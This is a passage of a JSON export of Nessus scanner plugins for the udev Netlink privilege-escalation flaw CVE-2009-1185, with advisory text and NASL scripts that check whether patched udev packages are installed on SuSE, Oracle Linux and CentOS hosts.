"bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1185"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:libvolume_id1", "p-cpe:/a:novell:suse_linux:11:udev", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_11_LIBUDEV-DEVEL-090414.NASL", "href": "https://www.tenable.com/plugins/nessus/41432", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(41432);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-1185\");\n\n script_name(english:\"SuSE 11 Security Update : udev (SAT Patch Number 766)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes a local privilege escalation in udev.\n\n - udev did not check the origin of the netlink messages. A\n local attacker could fake device create events and so\n gain root privileges. (CVE-2009-1185)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=493158\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1185.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 766.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux udev Netlink Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libvolume_id1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:udev\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (pl) audit(AUDIT_OS_NOT, \"SuSE 11.0\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"libvolume_id1-128-13.2.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"udev-128-13.2.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"libvolume_id1-128-13.2.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"udev-128-13.2.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"libvolume_id1-128-13.2.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"udev-128-13.2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:38:15", "description": "From Red Hat Security Advisory 2009:0427 :\n\nUpdated udev packages that fix one security issue are now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the Red Hat Security Response Team.\n\nudev provides a user-space API and implements a dynamic device directory, providing only the devices present on the system. udev replaces devfs in order to provide greater hot plug functionality.\nNetlink is a datagram oriented service, used to transfer information between kernel modules and user-space processes.\n\nIt was discovered that udev did not properly check the origin of Netlink messages. A local attacker could use this flaw to gain root privileges via a crafted Netlink message sent to udev, causing it to create a world-writable block device file for an existing system block device (for example, the root file system). (CVE-2009-1185)\n\nRed Hat would like to thank Sebastian Krahmer of the SUSE Security Team for responsibly reporting this flaw.\n\nUsers of udev are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. After installing the update, the udevd daemon will be restarted automatically.", "cvss3": {}, "published": "2013-07-12T00:00:00", "type": "nessus", "title": "Oracle Linux 5 : udev (ELSA-2009-0427)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1185"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:libvolume_id", "p-cpe:/a:oracle:linux:libvolume_id-devel", "p-cpe:/a:oracle:linux:udev", "cpe:/o:oracle:linux:5"], "id": "ORACLELINUX_ELSA-2009-0427.NASL", "href": "https://www.tenable.com/plugins/nessus/67842", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2009:0427 and \n# Oracle Linux Security Advisory ELSA-2009-0427 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67842);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-1185\");\n script_bugtraq_id(34536);\n script_xref(name:\"RHSA\", value:\"2009:0427\");\n\n script_name(english:\"Oracle Linux 5 : udev (ELSA-2009-0427)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2009:0427 :\n\nUpdated udev packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nudev provides a user-space API and implements a dynamic device\ndirectory, providing only the devices present on the system. udev\nreplaces devfs in order to provide greater hot plug functionality.\nNetlink is a datagram oriented service, used to transfer information\nbetween kernel modules and user-space processes.\n\nIt was discovered that udev did not properly check the origin of\nNetlink messages. A local attacker could use this flaw to gain root\nprivileges via a crafted Netlink message sent to udev, causing it to\ncreate a world-writable block device file for an existing system block\ndevice (for example, the root file system). (CVE-2009-1185)\n\nRed Hat would like to thank Sebastian Krahmer of the SUSE Security\nTeam for responsibly reporting this flaw.\n\nUsers of udev are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the udevd daemon will be restarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2009-April/000970.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected udev packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux udev Netlink Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libvolume_id\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libvolume_id-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:udev\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/04/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/04/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"libvolume_id-095-14.20.el5_3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"libvolume_id-devel-095-14.20.el5_3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"udev-095-14.20.el5_3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libvolume_id / libvolume_id-devel / udev\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T15:44:07", "description": "Updated udev packages that fix one security issue are now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the Red Hat Security Response Team.\n\nudev provides a user-space API and implements a dynamic device directory, providing only the devices present on the system. udev replaces devfs in order to provide greater hot plug functionality.\nNetlink is a datagram oriented service, used to transfer information between kernel modules and user-space processes.\n\nIt was discovered that udev did not properly check the origin of Netlink messages. A local attacker could use this flaw to gain root privileges via a crafted Netlink message sent to udev, causing it to create a world-writable block device file for an existing system block device (for example, the root file system). (CVE-2009-1185)\n\nRed Hat would like to thank Sebastian Krahmer of the SUSE Security Team for responsibly reporting this flaw.\n\nUsers of udev are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. After installing the update, the udevd daemon will be restarted automatically.", "cvss3": {}, "published": "2010-01-06T00:00:00", "type": "nessus", "title": "CentOS 5 : udev (CESA-2009:0427)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1185"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:libvolume_id", "p-cpe:/a:centos:centos:libvolume_id-devel", "p-cpe:/a:centos:centos:udev", "cpe:/o:centos:centos:5"], "id": "CENTOS_RHSA-2009-0427.NASL", "href": "https://www.tenable.com/plugins/nessus/43742", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2009:0427 and \n# CentOS Errata and Security Advisory 2009:0427 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43742);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2009-1185\");\n script_bugtraq_id(34536);\n script_xref(name:\"RHSA\", value:\"2009:0427\");\n\n script_name(english:\"CentOS 5 : udev (CESA-2009:0427)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated udev packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nudev provides a user-space API and implements a dynamic device\ndirectory, providing only the devices present on the system. udev\nreplaces devfs in order to provide greater hot plug functionality.\nNetlink is a datagram oriented service, used to transfer information\nbetween kernel modules and user-space processes.\n\nIt was discovered that udev did not properly check the origin of\nNetlink messages. A local attacker could use this flaw to gain root\nprivileges via a crafted Netlink message sent to udev, causing it to\ncreate a world-writable block device file for an existing system block\ndevice (for example, the root file system). (CVE-2009-1185)\n\nRed Hat would like to thank Sebastian Krahmer of the SUSE Security\nTeam for responsibly reporting this flaw.\n\nUsers of udev are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the udevd daemon will be restarted automatically.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2009-April/015796.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?06228205\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2009-April/015797.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4b74478d\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected udev packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux udev Netlink Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libvolume_id\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libvolume_id-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:udev\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/04/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/04/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"libvolume_id-095-14.20.el5_3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"libvolume_id-devel-095-14.20.el5_3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"udev-095-14.20.el5_3\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libvolume_id / libvolume_id-devel / udev\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:26:22", "description": "This update fixes a local privilege escalation in udev.\n\n - udev did not check the origin of the netlink messages. A local attacker could fake device create events and so gain root privileges. (CVE-2009-1185)\n\nThe previous update did not apply the actual patch fixing this problem, as was reported to us by SGI.\n\nPlease reboot the machine after installing the update, or run:\n/etc/init.d/boot.udev restart", "cvss3": {}, "published": "2009-09-24T00:00:00", "type": "nessus", "title": "SuSE 10 Security Update : udev (ZYPP Patch Number 6203)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1185"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_UDEV-6203.NASL", "href": "https://www.tenable.com/plugins/nessus/41594", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(41594);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-1185\");\n\n script_name(english:\"SuSE 10 Security Update : udev (ZYPP Patch Number 6203)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes a local privilege escalation in udev.\n\n - udev did not check the origin of the netlink messages. A\n local attacker could fake device create events and so\n gain root privileges. (CVE-2009-1185)\n\nThe previous update did not apply the actual patch fixing this\nproblem, as was reported to us by SGI.\n\nPlease reboot the machine after installing the update, or run:\n/etc/init.d/boot.udev restart\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1185.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6203.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux udev Netlink Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/04/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"udev-085-30.54\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"udev-085-30.54\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:24:54", "description": "This update fixes a local privilege escalation in udev.\n\nCVE-2009-1185: udev did not check the origin of the netlink messages.\nA local attacker could fake device create events and so gain root privileges.", "cvss3": {}, "published": "2009-07-21T00:00:00", "type": "nessus", "title": "openSUSE Security Update : libudev-devel (libudev-devel-768)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1185"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libudev-devel", "p-cpe:/a:novell:opensuse:libudev0", "p-cpe:/a:novell:opensuse:libvolume_id", "p-cpe:/a:novell:opensuse:libvolume_id-devel", "p-cpe:/a:novell:opensuse:libvolume_id1", "p-cpe:/a:novell:opensuse:udev", "cpe:/o:novell:opensuse:11.1"], "id": "SUSE_11_1_LIBUDEV-DEVEL-090414.NASL", "href": "https://www.tenable.com/plugins/nessus/40271", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update libudev-devel-768.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40271);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-1185\");\n\n script_name(english:\"openSUSE Security Update : libudev-devel (libudev-devel-768)\");\n script_summary(english:\"Check for the libudev-devel-768 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes a local privilege escalation in udev.\n\nCVE-2009-1185: udev did not check the origin of the netlink messages.\nA local attacker could fake device create events and so gain root\nprivileges.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=493158\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libudev-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux udev Netlink Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libudev-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libudev0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvolume_id\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvolume_id-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvolume_id1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:udev\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"libudev-devel-128-9.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"libudev0-128-9.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"libvolume_id-126-17.38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"libvolume_id-devel-128-9.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"libvolume_id1-128-9.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"udev-128-9.7.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, 